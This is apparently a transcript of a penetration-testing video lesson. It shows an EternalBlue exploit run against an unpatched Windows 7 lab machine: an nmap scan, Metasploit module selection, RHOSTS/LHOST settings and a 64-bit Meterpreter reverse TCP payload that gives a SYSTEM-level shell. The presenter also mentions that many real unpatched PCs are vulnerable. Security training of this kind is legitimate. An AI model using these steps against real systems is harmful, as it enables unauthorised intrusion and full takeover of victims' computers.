Hello everybody and welcome to the first practical lesson of our system hacking section. And in this type of video we are going to actually run the first exploit attack on the Windows 7 target. There are two things that you're going to need. The first thing that you're going to need is the actual Windows 7 virtual machine right here, or it can actually be a laptop or different computer, basically any PC that is running Windows 7. Now the key thing is that Windows 7 is not an updated PC. Now the reason behind that is because this is an attack from the actual 2017, and any actual Windows 7 machine that has updated their PC or their operating system from that time will not be vulnerable to this attack because they have fixed it. But there are lots of the machines that haven't been updated. There are lots of people that don't update their operating system, or they have a cracked version, and therefore they will be vulnerable to this attack. So right here I have a Windows 7 machine. I will start it up. Now, if you don't have a Windows 7 virtual machine, just search up on the YouTube and install it on your virtual box as virtual machine. And then what you want to do as soon as you install it, you want to open it up, and what we're going to do right after it is we're going to scan that target. Once you have the Windows 7 set up, you want to go to the settings, you want to go to the network and set it to be a breached adapter, the same as your Kali Linux, because then it will belong to our local area network and it will have the IP address of the local area network. Okay, so once you set all of that up, run both your Kali Linux machine and your Windows 7 machine. Now, if you have it might actually slow down your PC because you're running two virtual machines. As we can see, this one actually takes up 4 GB of RAM in my case, and this Windows 7 machine takes up 2 GB of RAM. So everything will possibly run a little bit slower, so don't worry about that. It is normal as you're running 3 machines on one. And right here, I believe test123 is my password. Type it up. Activate Windows now. We do not want to activate Windows, and here is my Windows 7 machine. Once it opens up, what we want to do is simply just let me check out what the IP address of this machine is. ipconfig 192.168.1.6. okay, so right here what we're going to do is we're going to open this terminal. Let me just zoom this in. And we're going to simply just nmap. We do not want the actual version. Let us just do a regular nmap scan on that specific target. So since this is in the local area network, it shouldn't take too long. And here it is. We can see that the result is 999 filtered ports and one port open, which is port 445, which is running Microsoft DS. Now that is enough for us to actually launch our Eternalblue attack, because it is ran on this port right here over the SMP. And all we need to do right now is open up our MSF console, and you will see how easy this attack is to perform. If the target is not updated Windows 7 machine, this will be the most easiest thing that you can do in order to hack a certain machine. In order to actually find the Eternalblue exploit, you can simply just type search Eternalblue, press here enter, and it will print you out different Eternalblue results right here. So we can see I just typed the search Eternalblue command, and right here we have 5 results. 2 of them are the auxiliary modules, which we are not interested in, and 3 of them are the exploits. As we can see, the PS execute exploits, the Eternalblue Windows 8 exploit, which we are not interested in at the moment because we are attacking Windows 7 machine. What we are interested in is the regular Eternalblue exploit, so simply just copy this right here and then type use and then simply just paste the actual exploit. We can clear the screen, as in the actual Metasploit framework command line. We can run any command that we can run in the terminal as well. So for example, ifconfig we can run right here. We can run ping 192.161.1.1 count 4 times. So you can simply just run any other command that you can run in terminal without using the Metasploit framework console. But what we're interested in is running our options for this specific attack, and you can see there is quite a bit of them. So right now we have the verify arch, verify target true, check if remote system or check if remote OS matches exploit target. So what this will do is it will simply just check out whether the target is vulnerable to that specific attack. we can see that the exploit target is the Windows 7 and Server 2008 x64, all service packs. Right here we have the R hosts. That is the only thing that is not specified, and the R host is simply just the IP address of your target machine. As we can see, it says right here the target address range of CDR identifier. So right here we simply specify the R host or the IP address of our Windows 7 target, and we can do that simply just by typing set and then the name of the actual field, which in our case are hosts, and then the IP address right after it, so 192.168.1.6 in my case. In your case, simply just check out the IP address on your Windows 7 machine just by going to the start menu, then in the search bar simply just type cmd, press your enter and type ipconfig in the command prompt, and you will see your IP address right here. Okay, once you find it out, specify it right here with this command, and all we need to do is set the payload that we are going to use right after we exploit this target. Now, the payload that we are going to use is the interpreter shell that we mentioned previously. Now, why we are using the interpreter shell? Because it is simply the best payload that we can deliver to the target. It gives us a bunch of different options that we can actually use on the target, and it is a really useful shell. We need to combine this exploit with that specific payload in order to actually get a session with the target system. So in order to set the payload, you can simply just type set payload and then the name of the payload, and simply just copy what I type because I know the name of the payload myself. So Windows, because we are attacking Windows, then slash interpreter and then slash reverse TCP. So we want the reverse shell. We set the payload to be Windows slash interpreter slash reverse TCP. If you want to simply just search all available payloads, you can simply just type show payloads, and you will have all of the available payloads for this specific attack, as we can see right here, or all are x64, because this actual Eternalblue attack is based on the 64-bit machine. So make sure once you actually create the Windows 7 machine, you make it 64-bit, so you download the 64-bit version right here and you run the 64-bit version. Then you will be able to actually run this attack, but in the next video where we actually run the double pulsar attack, which is also based on the Eternalblue attack, I will show you how you can actually run this on a 32-bit targets as well. And another reason why we are showing the double pulsar attack is because for some of you, this attack might not work. That is because sometimes this attack in the Metasploit Framework console does not work. Therefore, there is an actual tool on GitHub or an actual exploit based on the Eternalblue exploit called the double pulsar. It allows us to specify a few more options right here and run the attack and make it work. Okay, so right now you can see that something has changed since we actually specified the interpreter reverse TCP payload. Right here we have a few additional options. So for example, we have the L host, the L port, and the exit function. We can see all of them are required, but one of them is not set right here. And now the L host and L port basically stand for local host and local port. It is the IP address of your own Kali Linux machine, and it is the port on which you want to make a connection. So in our case, we will leave the port on 4444 because this is a default Metasploit framework port used for hacking, and the L host has to be the actual IP address of your Kali Linux machine from which you are attacking, or from any other PC in case you are attacking from that PC. So you can simply just type ipconfig, copy your IP address. Let me just clear this, show options once again. And in order to set this, you simply set it the same way that we set the R hosts. We can simply just type set L host and then paste the IP address. Let's check for all of the actual options right here. So everything is set. And if we simply just type exploit, started reverse TCP handler on 192.168.1.3. And in this specific case, you will notice that this attack will not work. And the reason behind that is because we actually made a little bit of a mistake right here. We specified the payload options because it says right here host is likely vulnerable to the MS-17. Maybe it actually does work, but in case it doesn't, I know what the problem is. The problem is that we actually specified right here Windows Interpreter Reverse TCP, and this is an actual payload for a 32-bit attack, and we need the payload for the 64-bit attack because, as you saw, once we printed out show payloads, all of the available payloads for this attack were 64-bit. So right here, what we're going to do, as it says right here, it failed the attack. We're going to Control-C this, and we're going to simply just switch up the payload. So switch it up, we simply just copy this, as we are going to use the same payload just in between. So set payload, then paste the actual name. In between Windows and Meterpreter, we want to type Windows / and then x64 and then /Meterpreter / reverse TCP. Press here enter, clear the screen, show options once again. We can see everything is set. We just switched up our payload. And right now, if we run the attack once again, simply just by typing the word exploit in the command line, this attack should now work. So let's wait for this to actually finish. As we can see, it says started reverse TCP handler on specific IP address, which in our case is the IP address of our Kali Linux machine. We can see host is likely vulnerable to this attack. Windows 7 Ultimate Service Pack 1. Okay, and here is our Meterpreter session 1 opened. So we can see that we actually managed to hack the target, and right now we are on target PC. We get the Meterpreter shell, which we are not going to discuss right now. So you can simply just type help menu to see all of your available commands for the actual shell. But we're going to discuss them in some future video. For now on, just to make sure that we are in the actual target system, we can simply just type shell right here, and it will drop us into the command prompt shell on this Windows 7 target machine. And right now you can simply just type who am I, and you can see that you are the system. You can type that there in order to see all of the directory, and we can see we are in the system 32 directory on our Windows 7 target. In order to actually get out of this shell and go back to the Meterpreter, you can simply just type exit, type help once again, and see all of the other available options as well. But right now we are not going to cover these options, we are going to cover them in some future video. From now on, we are only glad that we managed to actually hack our target and gain access to it on a system authority level. That means that we can do anything we want to the target PC. So basically that would be about it for this attack, and in the next tutorial I will show you the double pulsar attack in case this one doesn't work for you. So hope you enjoyed this tutorial, and I hope I will see you in the next one. Bye!